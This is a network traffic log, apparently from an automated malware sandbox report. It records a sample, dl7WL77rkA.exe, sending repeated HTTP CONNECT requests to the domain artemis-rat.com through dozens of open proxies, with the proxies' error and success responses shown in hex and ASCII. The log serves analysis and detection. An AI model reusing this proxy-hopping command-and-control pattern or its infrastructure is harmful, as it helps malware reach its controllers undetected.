                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1352192.168.2.5535725.9.98.14234383876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.588726044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1353192.168.2.55357094.23.84.2581183876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.589096069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.742468119 CET161INHTTP/1.1 503 Too many open connections
                                                                                                                                                                                                                                                            Proxy-Agent: Privoxy 3.0.21
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: Maximum number of open connections reached.


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1354192.168.2.551932105.112.140.21880803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.646192074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.701957941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.935082912 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1355192.168.2.553080103.174.102.127803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.646298885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.694468975 CET536INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:47 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.29 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 614
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.694647074 CET270INData Raw: 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72
                                                                                                                                                                                                                                                            Data Ascii: the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at artemis-rat.com Port 44


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1356192.168.2.55355227.65.240.15710803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.646677971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1357192.168.2.55240072.195.114.16941453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.646747112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1358192.168.2.552093114.79.148.218803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.646804094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.702035904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.702207088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.717706919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1359192.168.2.55209127.147.131.12280903876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.652465105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.702054024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.014017105 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1360192.168.2.553615103.151.20.131803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.652965069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.445910931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.505959988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.572614908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.701963902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.905103922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.074121952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1361192.168.2.552042115.167.124.7580803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.653268099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.624375105 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1362192.168.2.55359831.44.82.2380803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.653311014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.405092001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.499130011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.626965046 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1363192.168.2.553620185.217.143.23803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.659826040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1364192.168.2.553557103.83.36.156783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.660538912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1365192.168.2.55358178.38.108.19910803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.696978092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1366192.168.2.553549102.132.50.680803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.697710037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1367192.168.2.553645150.230.96.150192913876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.697961092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1368192.168.2.553671172.67.182.107803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.699110985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.854408026 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:43 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1369192.168.2.553641115.146.225.137100463876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.743164062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.446008921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1370192.168.2.553654200.10.73.21056783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.743355989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1371192.168.2.553735172.67.181.147803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.743467093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.898401022 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:43 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1372192.168.2.55363436.92.81.18141453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.746926069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1373192.168.2.553750162.159.250.145803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.747518063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
